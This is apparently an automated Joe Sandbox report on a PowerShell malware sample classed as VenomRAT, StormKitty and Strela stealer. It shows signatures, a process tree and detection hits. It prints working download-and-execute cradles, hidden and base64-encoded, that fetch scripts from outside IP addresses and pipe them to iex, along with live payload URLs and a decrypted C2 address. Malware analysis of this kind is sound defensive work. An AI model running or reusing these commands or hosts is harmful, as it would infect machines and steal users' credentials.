Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2 ps1.ps1

Overview

General Information

Sample name:2 ps1.ps1
Analysis ID:1583431
MD5:005b395fecc3e18d5bc9acb93bf96a4f
SHA1:34db5ff90015817fe8b2fe56ca241d6965ae95d4
SHA256:5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
Tags:bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

KeyLogger, StormKitty, Strela Stealer, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected Keylogger Generic
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected Strela Stealer
Yara detected VenomRAT
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Compiles code for process injection (via .Net compiler)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 3200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7104 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Package.exe (PID: 2972 cmdline: C:\Windows\Temp\Package.exe MD5: 2696D944FFBEF69510B0C826446FD748)
          • cmd.exe (PID: 5468 cmdline: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2276 cmdline: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • csc.exe (PID: 7196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
                • cvtres.exe (PID: 7212 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
              • RegAsm.exe (PID: 7292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 7308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 7316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 7324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WerFault.exe (PID: 7472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, 404KeyLogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x3407e4:$a1: havecamera
  • 0x39282e:$a2: timeout 3 > NUL
  • 0x395f91:$a3: START "" "
  • 0x396538:$a3: START "" "
  • 0x396413:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x3964b0:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
dump.pcapINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
  • 0x39a8a2:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x392058:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}
  • 0x38dcc8:$s6: VirtualBox
  • 0x39edc7:$s6: VirtualBox
  • 0x39a0de:$s8: Win32_ComputerSystem
  • 0x39ed2d:$s8: Win32_ComputerSystem
  • 0x396eb6:$s9: Win32_Process Where ParentProcessID=
  • 0x3969af:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x396ba7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x396c8f:$cnc4: POST / HTTP/1.1
SourceRuleDescriptionAuthorStrings
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
    00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
      00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
          00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_Generic_3Yara detected Keylogger GenericJoe Security
            Click to see the 23 entries
            SourceRuleDescriptionAuthorStrings
            8.2.powershell.exe.525bde2.0.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            8.2.powershell.exe.4f9a7a0.2.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            8.2.powershell.exe.503ed84.1.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            8.2.powershell.exe.503a820.4.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x4b2c:$x2: https://github.com/LimerBoy/StormKitty
            • 0x4b48:$x3: StormKitty
            8.2.powershell.exe.4f6df4c.3.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x2ce1c:$x2: https://github.com/LimerBoy/StormKitty
            • 0x2ce38:$x3: StormKitty
            Click to see the 63 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 2972, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 5468, ProcessName: cmd.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", ProcessId: 3200, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", ProcessId: 7196, ProcessName: csc.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 2972, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 5468, ProcessName: cmd.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3200, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA, ProcessId: 2180, ProcessName: powershell.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 2276, ProcessName: powershell.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 2972, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 5468, ProcessName: cmd.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2276, TargetFilename: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1", ProcessId: 3200, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2180, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", ProcessId: 7196, ProcessName: csc.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T19:14:09.008753+010018100002Potentially Bad Traffic192.168.2.549714185.149.146.16480TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://147.45.44.131/infopage/ersyb.exeAvira URL Cloud: Label: malware
            Source: http://147.45.44.131/infopage/iubn.ps1Avira URL Cloud: Label: malware
            Source: http://147.45.44.131/infopage/iviewers.dllAvira URL Cloud: Label: malware
            Source: http://147.45.44.131/infopage/rwvg1.exeAvira URL Cloud: Label: malware
            Source: http://185.149.146.164/wrcaf.ps1Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
            Source: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dllJoe Sandbox ML: detected
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: 4449
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: 157.20.182.177
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: RAT + hVNC 6.0.5
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: false
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: rbdebzqnfarpyomol
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: MIICLjCCAZegAwIBAgIVAPMNUbaXLLtiHcN1m+dlPpK7vns9MA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAzMTgxNjQ3MjZaFw0zNDEyMjYxNjQ3MjZaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCaTwbFDhuWkASq9P+NWgPLnP41KwsDJJLX7xv2vo4FUXTwpEsoIrbqvSKldDp6m3lNHXNWYqqy0JX1ZnvClJ/gvVpmMCJfzkIDbW0sKPoOMmwx4PjzdNDQbKSSmM6rMMu8tDchwJEfQtMlgGPXFsMnPTYj6xNeMBCjcTIP5gwFCQIDAQABozIwMDAdBgNVHQ4EFgQU06NiTQAo8LSYzcJVCrt9Ah49blwwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQBg3cQkJK1HiQGjHKgDefp3ooSUSiEh+SRWC4Q/Jsp2TsM6Me9+ix/2g+oxV6/rhaeJkcDDCBtnjouhViDhezLBfl3oE0P29Ssq/skwUyjEZDScIepLewWrtQYtjyYbQL/ubsa0hoLDSZaKydxgH8cAtvOvMqE6WjrfEvcVupZLMQ==
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: Q+AFJAFiCL8OIXnK8vpppK2iElr5z1WborIl7rv6KiQoJrBbUTm5VXnSYAmidoRGFDhbPZQNsmEzkAX+OxkvuApCdcHhIykks+QzQbWVaQ2kFUGLle9WnlLZKzmw4R0L8hrBDa6GtG0avdXbvgSOzH5rALYyXUgmgBPNJoJdbSM=
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: null
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: false
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: false
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: Default
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: false
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpackString decryptor: false
            Source: Binary string: C:\Users\Administrator\source\repos\Project9\Release\Project9.pdb source: Package.exe, 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmp, iviewers.dll.3.dr
            Source: Binary string: OLEView.pdb source: powershell.exe, 00000003.00000002.2177596881.00000169B176B000.00000004.00000800.00020000.00000000.sdmp, Package.exe, Package.exe, 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Package.exe.3.dr
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.pdb source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F6CE9 FindFirstFileExW,5_2_6E2F6CE9

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            barindex
